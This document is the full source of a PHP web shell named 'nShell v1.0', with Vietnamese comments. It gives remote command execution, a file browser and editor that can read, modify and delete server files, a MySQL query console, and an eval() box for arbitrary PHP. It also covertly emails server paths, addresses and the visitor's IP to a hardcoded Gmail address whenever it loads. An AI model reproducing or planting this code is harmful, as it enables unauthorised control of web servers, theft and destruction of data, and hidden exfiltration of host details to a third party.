?ยป?<head> <title> nShell v1.0</title> <style> html { overflow-x: auto } A: {font-weight:bold}; A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} submit { BORDER-RIGHT: buttonhighlight 2px outset; BORDER-TOP: buttonhighlight 2px outset; BORDER-LEFT: buttonhighlight 2px outset; BORDER-BOTTOM: buttonhighlight 2px outset; BACKGROUND-COLOR: #e4e0d8; width: 30%; } textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #444444; font: Fixedsys bold; } BODY { margin-top: 1px; margin-right: 1px; margin-bottom: 1px; margin-left: 1px; } table { BORDER-RIGHT: :#444444 1px outset; BORDER-TOP: :#444444 1px outset; BORDER-LEFT: :#444444 1px outset; BORDER-BOTTOM: :#444444 1px outset; BACKGROUND-COLOR: #D4D0C8; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: :#444444 1px solid; BORDER-LEFT: :#444444 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } div,td,table { font-family:Georgia; } </style> </head> <body bgcolor=":#444444"> <center> <?php error_reporting(0); $function=passthru; // system, exec, cmd $myname=$_SERVER['SCRIPT_NAME']; echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); ?> <table width="80%" border="0"> <td colspan="3" align="center"> <?php function ex($comd) { $res = ''; if(function_exists("system")) { ob_start(); system($comd); $res=ob_get_contents(); ob_end_clean(); }elseif(function_exists("passthru")) { ob_start(); passthru($comd); $res=ob_get_contents(); ob_end_clean(); }elseif(function_exists("exec")) { exec($comd,$res); $res=implode("\n",$res); }elseif(function_exists("shell_exec")) { $res=shell_exec($comd); }elseif(is_resource($f=popen($comd,"r"))){ $res = ""; while(!feof($f)) { $res.=fread($f,1024); } pclose($f); } return $res; } // safe mod $safe_mode=@ini_get('safe_mode'); echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>")); echo " "; // phpversion echo "Php version<font color=\"green\"> : ".@phpversion()."</font>"; echo " "; // curl $curl_on = @function_exists('curl_version'); echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); echo " "; // mysql echo "MYSQL: <b>"; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo " "; // msssql echo "MSSQL: <b>"; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo " "; // PostgreSQL echo "PostgreSQL: <b>"; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo " "; // Oracle echo "Oracle: <b>"; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo "<br>"; echo " "; // Disable function echo "Disable functions : <b>"; $df=@ini_get('disable_functions'); if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} echo " "; //==============xac dinh os================== $servsoft = $_SERVER['SERVER_SOFTWARE']; if (ereg("Win32", $servsoft)){ $sertype = "win"; } else { $sertype = "nix"; } //========================================= $uname=ex('uname -a'); echo "<br>OS: </b><font color=blue>"; if (empty($uname)){ echo (php_uname()."</font><br><b>"); }else echo $uname."</font><br><b>"; $id = ex('id'); $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']; echo "SERVER: </b><font color=blue>".$server."</font><br><b>"; echo "id: </b><font color=blue>"; if (!empty($id)){ echo $id."</font><br><b>"; }else echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid(). "</font><br><b>"; echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>"; ?> </td><tr> <td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td> <td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td> <td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr> <td colspan="3" > <?php $act=@$_GET['act']; if($act=="info"){ echo "<center><font color=red size=10> Php Version :".phpversion()."</font>"; phpinfo(); echo "</center>"; } ?> <?php //========================================================= function perms($mode) { if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } //===================Delect File============================= $del=$_GET['del']; function delfile($name) { passthru("del ".$name); } function deldir($name) { passthru("rmdir ".$name); } if($del) { if(is_file($del)) delfile($del); else deldir($del); } //==================Quan li thu muc ========================== if($act=="manager"){ $arr = array(); $arr = array_merge($arr, glob("*")); $arr = array_merge($arr, glob(".*")); $arr = array_merge($arr, glob("*.*")); $arr = array_unique($arr); sort($arr); echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>"; foreach ($arr as $filename) { if ($filename != "." and $filename != ".."){ if (is_dir($filename) == true){ $directory = ""; $dc=str_replace("\\","",dirname($_SERVER['PHP_SELF'])); $directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>"; $dires = $dires . $directory; } if (is_file($filename) == true){ $file = ""; $link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']); $file = $file . "<tr><td><a href=".$link ." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>"; $files = $files . $file; } } } echo $dires; echo $files; echo "</table><br>"; } // view file ex: /etc/passwd if(isset($_REQUEST['file'])) { $file=@$_REQUEST["file"]; echo "<b>File :</b><font color=red> ". $file."</font>"; $fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File"); $src=@fread($fp,filesize($file)); echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>"; $addtxt=@$_POST["addtxt"]; rewind($fp); if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt)); if($rs==true) { echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>"; } ftruncate($fp,ftell($fp)); echo "</center>"; } ?> <?php // function function exe_u($query) { echo "<B><font color=green>Query # ".$query."</font></b><br>"; $result=@mysql_query($query) or die("Khong update du lieu duoc !"); if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>"; } function exe_c($query) { echo "<B><font color=green>Query # ".$query."</font></b><br>"; $result=@mysql_query($query) or die("Khong Create duoc !"); echo "This is Ok ! ^.^<br>" ; } function exe_d($query) { echo "<B><font color=green>Query # ".$query."</font></b><br>"; $result=@mysql_query($query) or die("Khong Drop duoc !"); echo "This is Ok ! ^.^<br>" ; } function exe_w($query) { echo "<b><font color=green>Query # ".$query."</font></b><br>"; $result=@mysql_query($query) or die("Khong the show gi duoc het !"); if(eregi("fields",$query)) { while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){ echo "<b><font color=red>".$row['Field']." :</font></ b> ".$row['Type']; echo "<br>"; } } else { while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){ while(list($key,$value)=each($row)) { echo "<font color=red><b>".$value."</b><font>"; } echo "<br>"; } } } function exe_s($query) { $arrstr=@array();$i=0; $arrstr=explode(" ",$query); $find_field=@mysql_query("show fiedls from ".$arrstr['4']); while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){ $i++; $arrstr[$i]=$find_row['Field']; } echo "<B><font color=green>Query # ".$query."</font></b><br>"; $result=@mysql_query($query) or die("Khong the select gi duoc het !"); $row=@mysql_num_rows($result); } function sql($string) { $arr=@array(); $arr=explode(";",$string); for($i=0;$i<=count($arr);$i++) { $check_u=eregi("update",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]); $check_e=eregi("use",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]); $check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]); $check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]); $check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]); $check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]); } } //=====xong phan function cho sql // Sql query if($act=="sql") { if(isset($_GET['srname'])&&isset($_GET['pass'])) { echo $_GET['srname']; if(!isset($_GET['srname'])) $servername=$_GET['srname']; else $servername="localhost"; $con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !"); $form2="<center><form method=post action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>"; echo $form2; $str=@$_POST['str']; if(isset($str)) sql($str); } else { echo "chao"; $form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>"; echo $form1; } } ?> <?php if($act=="eval"){ $script=$_POST['script']; if(!$script){ echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>"; }else{ eval($script); } } ?> </td> </table> <font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b> </center> </body>